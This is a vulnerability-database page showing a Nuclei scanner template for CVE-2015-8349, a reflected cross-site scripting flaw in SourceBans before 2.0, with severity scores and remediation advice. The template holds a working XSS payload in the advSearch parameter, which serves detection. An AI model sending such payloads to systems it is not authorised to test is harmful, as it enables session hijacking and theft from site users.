Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-8349
HistoryJul 28, 2021 - 5:45 a.m.

SourceBans <2.0 - Cross-Site Scripting

2021-07-2805:45:44
ProjectDiscovery
github.com
21
sourcebans
cross-site scripting
remote attackers

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

48.2%

SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.

id: CVE-2015-8349

info:
  name: SourceBans <2.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability.
  reference:
    - https://www.htbridge.com/advisory/HTB23273
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8349
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2015-8349
    cwe-id: CWE-79
    epss-score: 0.0013
    epss-percentile: 0.46975
    cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gameconnect
    product: sourcebans
  tags: cve2015,cve,xss,sourcebans,gameconnect

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e8c85a9f4b86dd8d0a78a921160b422af2c670de30733405b10f0ba61584956202204fc67969930e7cb905857f698dedf73948092520552cbf14d9a58f53aa98a869:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

48.2%

Related for NUCLEI:CVE-2015-8349